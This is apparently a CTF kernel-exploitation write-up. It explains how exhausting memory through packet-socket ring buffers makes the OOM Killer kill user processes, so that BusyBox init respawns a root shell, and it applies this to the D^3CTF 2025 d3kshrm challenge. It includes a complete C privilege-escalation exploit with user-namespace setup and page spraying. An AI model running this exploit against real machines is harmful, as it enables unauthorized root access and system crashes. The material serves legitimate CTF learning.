Triggering OOM Killer via Memory Overflow to Obtain a Root Shell¶

The core reason this trick works is that the challenge author configured the environment too conventionally and followed the BusyBox official documentation too closely.

In Linux systems, there is usually a certain limit on the memory that a process can allocate. However, for CTF environments, the virtual machine itself typically has a small amount of memory (e.g., 128MB), so the memory that user processes can allocate can easily reach the system's physical memory limit, thereby waking up the OOM Killer to kill processes.

The OOM Killer's strategy for killing processes is based on a comprehensive evaluation of multiple factors, including process priority and resource consumption. Processes with higher privileges are less likely to be killed, while processes consuming more resources are more likely to be killed. The OOM Killer combines these factors to assign each process an OOM Score, where a higher score means a higher likelihood of being killed. We can view a process's current OOM Score through the procfs interface at /proc/[pid]/oom_score. It is worth noting that the OOM Killer may kill multiple processes in a single invocation, because the memory reclaimed from a single kill may not be sufficient to satisfy the original memory allocation request, due to reasons such as memory fragmentation or insufficient memory reclaimed from a single process.

In CTF kernel pwn environments such as the one described in the previous article, we typically focus on the following three processes: rcS, sh, and exploit. What happens when all three of these processes are killed? At this point, ttyS0 enters an idle state, and /sbin/init (PID 1, which is typically not killed) monitors the tty state. When the current tty becomes idle, it will launch a user process according to the configuration in /etc/inittab: starting the user-space process specified by ::askfirst: with root privileges.

Previously, the vast majority of Linux kernel pwn environment configurations directly or indirectly followed the example specification provided by BusyBox officially. The example for /etc/inittab and the default behavior when the file does not exist are as follows:

# Note: BusyBox init works just fine without an inittab. If no inittab is
# found, it has the following default behavior:
#   ::sysinit:/etc/init.d/rcS
#   ::askfirst:/bin/sh
#   ::ctrlaltdel:/sbin/reboot
#   ::shutdown:/sbin/swapoff -a
#   ::shutdown:/bin/umount -a -r
#   ::restart:/sbin/init
#   tty2::askfirst:/bin/sh
#   tty3::askfirst:/bin/sh
#   tty4::askfirst:/bin/sh

We notice that the ::askfirst: entry is configured as /bin/sh, which means if we can trigger the OOM Killer to kill all user-space processes except PID 1, we can automatically obtain a root shell. In the initial CTF kernel pwn environment, rcS and sh typically have the same OOM Score (usually 678), while our exploit process's initial score is usually lower (typically 666). Therefore, we can usually ensure that during the massive memory allocation process, our exploit process is the last one to be killed, thus guaranteeing that the current tty will eventually have no occupying process and will trigger the root shell.

However, it should be noted that this does not mean simply performing memory allocations will suffice. Directly performing large amounts of memory allocation will cause the exploit process's OOM Score to grow rapidly. At that point, our exploit process would be the first in the OOM Killer's kill queue, and once our exploit process is killed, the memory allocation actions stop, and the OOM Killer no longer needs to continue killing subsequent processes. The end result would simply be our exploit being killed.

Therefore, to achieve this attack, we need to perform memory allocation while avoiding increasing our exploit process's OOM Score. This can typically be accomplished through kernel-level non-accounting page allocation behavior. A good example is the allocation of packet socket ring buffers. Below is a minimal POC (wrapper functions such as create_pgv_socket() can be found at D^3CTF2025 - d3kshrm):

Additionally, if the challenge provides the capability to allocate large amounts of memory pages (e.g., D^3CTF2025 - d3kshrm), we can also typically use the API provided by the challenge directly for memory page allocation.

void unintended_exploit(void)
{
    int errno;
    prepare_pgv_system();

    for (int i = 0; i < 1000; i++) {
        if ((errno = create_pgv_socket(i)) < 0) {
            printf(ERROR_MSG("[x] Failed to allocate socket: ") "%d\n", i);
            err_exit("FAILED to allocate socket!");
        }

        if ((errno = alloc_page(i, 0x1000 * 64, 64)) < 0) {
            printf(ERROR_MSG("[x] Failed to alloc pages on socket: ")"%d\n", i);
            err_exit("FAILED to allocate pages!");
        }

        printf("[*] No.%d times\n", i);
        fflush(stdout);
    }

    puts("Done!?");
}

Correspondingly, commonly used memory allocation APIs such as pipe_buffer or msg_msg are not suitable for this scenario, because allocating such objects will cause the OOM Score to increase.

It should be noted that this approach does not guarantee obtaining a root shell. More likely outcomes may be System is deadlocked on memory or Out-of-memory causing a kernel panic. Therefore, in practice, this trick may not have sufficiently high generality.

Example: D^3CTF 2025 - d3kshrm¶

The original challenge files can be downloaded from https://github.com/arttnba3/D3CTF2025_d3kshrm.

We notice that in this challenge, the author very rigorously configured the /etc/inittab file's ::askfirst: entry to /bin/ash following the BusyBox official example, which means we can use the OOM attack against kernel pwn:

$ cat /etc/inittab
::sysinit:/etc/init.d/rcS
::askfirst:/bin/ash
::ctrlaltdel:/sbin/reboot
::shutdown:/sbin/swapoff -a
::shutdown:/bin/umount -a -r
::restart:/sbin/init

The challenge kernel does not restrict unprivileged users from creating packet sockets, so we can use packet sockets to perform massive memory allocations to trigger the OOM Killer. The final exploit is as follows:

/**
 * Copyright (c) 2025 arttnba3 <arttnba@gmail.com>
 * 
 * This work is licensed under the terms of the GNU GPL, version 2 or later.
**/

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <fcntl.h>
#include <unistd.h>
#include <sched.h>
#include <errno.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/msg.h>
#include <sys/socket.h>

/**
 * Kernel Pwn Infrastructures
**/

#define SUCCESS_MSG(msg)    "\033[32m\033[1m" msg "\033[0m"
#define INFO_MSG(msg)       "\033[34m\033[1m" msg "\033[0m"
#define ERROR_MSG(msg)      "\033[31m\033[1m" msg "\033[0m"

#define log_success(msg)    puts(SUCCESS_MSG(msg))
#define log_info(msg)       puts(INFO_MSG(msg))
#define log_error(msg)      puts(ERROR_MSG(msg))

void err_exit(char *msg)
{
    printf(ERROR_MSG("[x] Error at: ") "%s\n", msg);
    sleep(5);
    exit(EXIT_FAILURE);
}

int unshare_setup(void)
{
    char edit[0x100];
    int tmp_fd;

    if (unshare(CLONE_NEWNS | CLONE_NEWUSER | CLONE_NEWNET) < 0) {
        log_error("[x] Unable to create new namespace for PGV subsystem");
        return -EPERM;
    }

    tmp_fd = open("/proc/self/setgroups", O_WRONLY);
    write(tmp_fd, "deny", strlen("deny"));
    close(tmp_fd);

    tmp_fd = open("/proc/self/uid_map", O_WRONLY);
    snprintf(edit, sizeof(edit), "0 %d 1", getuid());
    write(tmp_fd, edit, strlen(edit));
    close(tmp_fd);

    tmp_fd = open("/proc/self/gid_map", O_WRONLY);
    snprintf(edit, sizeof(edit), "0 %d 1", getgid());
    write(tmp_fd, edit, strlen(edit));
    close(tmp_fd);

    return 0;
}

/**
 * pgv pages sprayer related 
 * not that we should create two process:
 * - the parent is the one to send cmd and get root
 * - the child creates an isolate userspace by calling unshare_setup(),
 *      receiving cmd from parent and operates it only
**/

#define PGV_SOCKET_MAX_NR 1024
#define PACKET_VERSION 10
#define PACKET_TX_RING 13

struct tpacket_req {
    unsigned int tp_block_size;
    unsigned int tp_block_nr;
    unsigned int tp_frame_size;
    unsigned int tp_frame_nr;
};

struct pgv_page_request {
    int idx;
    int cmd;
    unsigned int size;
    unsigned int nr;
};

enum {
    PGV_CMD_ALLOC_SOCKET,
    PGV_CMD_ALLOC_PAGE,
    PGV_CMD_FREE_PAGE,
    PGV_CMD_FREE_SOCKET,
    PGV_CMD_EXIT,
};

enum tpacket_versions {
    TPACKET_V1,
    TPACKET_V2,
    TPACKET_V3,
};

int cmd_pipe_req[2], cmd_pipe_reply[2];

int create_packet_socket()
{
    int socket_fd;
    int ret;

    socket_fd = socket(AF_PACKET, SOCK_RAW, PF_PACKET);
    if (socket_fd < 0) {
        log_error("[x] failed at socket(AF_PACKET, SOCK_RAW, PF_PACKET)");
        ret = socket_fd;
        goto err_out;
    }

    return socket_fd;

err_out:
    return ret;
}

int alloc_socket_pages(int socket_fd, unsigned int size, unsigned nr)
{
    struct tpacket_req req;
    int version, ret;

    version = TPACKET_V1;
    ret = setsockopt(socket_fd, SOL_PACKET, PACKET_VERSION, 
                     &version, sizeof(version));
    if (ret < 0) {
        log_error("[x] failed at setsockopt(PACKET_VERSION)");
        goto err_setsockopt;
    }

    memset(&req, 0, sizeof(req));
    req.tp_block_size = size;
    req.tp_block_nr = nr;
    req.tp_frame_size = 0x1000;
    req.tp_frame_nr = (req.tp_block_size * req.tp_block_nr) / req.tp_frame_size;

    ret = setsockopt(socket_fd, SOL_PACKET, PACKET_TX_RING, &req, sizeof(req));
    if (ret < 0) {
        log_error("[x] failed at setsockopt(PACKET_TX_RING)");
        goto err_setsockopt;
    }

    return 0;

err_setsockopt:
    return ret;
}

int free_socket_pages(int socket_fd)
{
    struct tpacket_req req;
    int ret;

    memset(&req, 0, sizeof(req));
    req.tp_block_size = 0x3361626e;
    req.tp_block_nr = 0;
    req.tp_frame_size = 0x74747261;
    req.tp_frame_nr = 0;

    ret = setsockopt(socket_fd, SOL_PACKET, PACKET_TX_RING, &req, sizeof(req));
    if (ret < 0) {
        log_error("[x] failed at setsockopt(PACKET_TX_RING)");
        goto err_setsockopt;
    }

    return 0;

err_setsockopt:
    return ret;
}

void spray_cmd_handler(void)
{
    struct pgv_page_request req;
    int socket_fd[PGV_SOCKET_MAX_NR];
    int ret;

    /* create an isolate namespace*/
    if (unshare_setup()) {
        err_exit("FAILED to initialize PGV subsystem for page spraying!");
    }

    memset(socket_fd, 0, sizeof(socket_fd));

    /* handler request */
    do {
        read(cmd_pipe_req[0], &req, sizeof(req));

        switch (req.cmd) {
        case PGV_CMD_ALLOC_SOCKET:
            if (socket_fd[req.idx] != 0) {
                printf(ERROR_MSG("[x] Duplicate idx request: ") "%d\n",req.idx);
                ret = -EINVAL;
                break;
            }

            ret = create_packet_socket();
            if (ret < 0) {
                perror(ERROR_MSG("[x] Failed at allocating packet socket"));
                break;
            }

            socket_fd[req.idx] = ret;
            ret = 0;

            break;
        case PGV_CMD_ALLOC_PAGE:
            if (socket_fd[req.idx] == 0) {
                printf(ERROR_MSG("[x] No socket fd for idx: ") "%d\n",req.idx);
                ret = -EINVAL;
                break;
            }

            ret = alloc_socket_pages(socket_fd[req.idx], req.size, req.nr);
            if (ret < 0) {
                perror(ERROR_MSG("[x] Failed to alloc packet socket pages"));
                break;
            }

            break;
        case PGV_CMD_FREE_PAGE:
            if (socket_fd[req.idx] == 0) {
                printf(ERROR_MSG("[x] No socket fd for idx: ") "%d\n",req.idx);
                ret = -EINVAL;
                break;
            }

            ret = free_socket_pages(socket_fd[req.idx]);
            if (ret < 0) {
                perror(ERROR_MSG("[x] Failed to free packet socket pages"));
                break;
            }

            break;
        case PGV_CMD_FREE_SOCKET:
            if (socket_fd[req.idx] == 0) {
                printf(ERROR_MSG("[x] No socket fd for idx: ") "%d\n",req.idx);
                ret = -EINVAL;
                break;
            }

            close(socket_fd[req.idx]);

            break;
        case PGV_CMD_EXIT:
            log_info("[*] PGV child exiting...");
            ret = 0;
            break;
        default:
            printf(
                ERROR_MSG("[x] PGV child got unknown command : ")"%d\n",
                req.cmd
            );
            ret = -EINVAL;
            break;
        }

        write(cmd_pipe_reply[1], &ret, sizeof(ret));
    } while (req.cmd != PGV_CMD_EXIT);
}

void prepare_pgv_system(void)
{
    /* pipe for pgv */
    pipe(cmd_pipe_req);
    pipe(cmd_pipe_reply);

    /* child process for pages spray */
    if (!fork()) {
        spray_cmd_handler();
    }
}

int create_pgv_socket(int idx)
{
    struct pgv_page_request req = {
        .idx = idx,
        .cmd = PGV_CMD_ALLOC_SOCKET,
    };
    int ret;

    write(cmd_pipe_req[1], &req, sizeof(struct pgv_page_request));
    read(cmd_pipe_reply[0], &ret, sizeof(ret));

    return ret;
}

int destroy_pgv_socket(int idx)
{
    struct pgv_page_request req = {
        .idx = idx,
        .cmd = PGV_CMD_FREE_SOCKET,
    };
    int ret;

    write(cmd_pipe_req[1], &req, sizeof(struct pgv_page_request));
    read(cmd_pipe_reply[0], &ret, sizeof(ret));

    return ret;
}

int alloc_page(int idx, unsigned int size, unsigned int nr)
{
    struct pgv_page_request req = {
        .idx = idx,
        .cmd = PGV_CMD_ALLOC_PAGE,
        .size = size,
        .nr = nr,
    };
    int ret;

    write(cmd_pipe_req[1], &req, sizeof(struct pgv_page_request));
    read(cmd_pipe_reply[0], &ret, sizeof(ret));

    return ret;
}

int free_page(int idx)
{
    struct pgv_page_request req = {
        .idx = idx,
        .cmd = PGV_CMD_FREE_PAGE,
    };
    int ret;

    write(cmd_pipe_req[1], &req, sizeof(req));
    read(cmd_pipe_reply[0], &ret, sizeof(ret));

    usleep(10000);

    return ret;
}

void banner(void)
{
    puts(SUCCESS_MSG("-------- D^3CTF2025::Pwn - d3kshrm --------") "\n"
    INFO_MSG("--------     Unintended Solution    --------\n")
    INFO_MSG("--------      Author: ")"arttnba3"INFO_MSG("      --------") "\n"
    SUCCESS_MSG("-------- Local Privilege Escalation --------\n"));
}

void unintended_exploit(void)
{
    int errno;
    prepare_pgv_system();

    for (int i = 0; i < 1000; i++) {
        printf("[*] No.%d times\n", i);
        fflush(stdout);
        if ((errno = create_pgv_socket(i)) < 0) {
            printf(ERROR_MSG("[x] Failed to allocate socket: ") "%d\n", i);
            err_exit("FAILED to allocate socket!");
        }

        if ((errno = alloc_page(i, 0x1000 * 64, 64)) < 0) {
            printf(ERROR_MSG("[x] Failed to alloc pages on socket: ")"%d\n", i);
            err_exit("FAILED to allocate pages!");
        }
        puts("Done.");

        fflush(stdout);
        //sleep(1);
    }

    puts("Done!?");
}

int main(int argc, char **argv, char **envp)
{
    banner();
    unintended_exploit();
    return 0;
}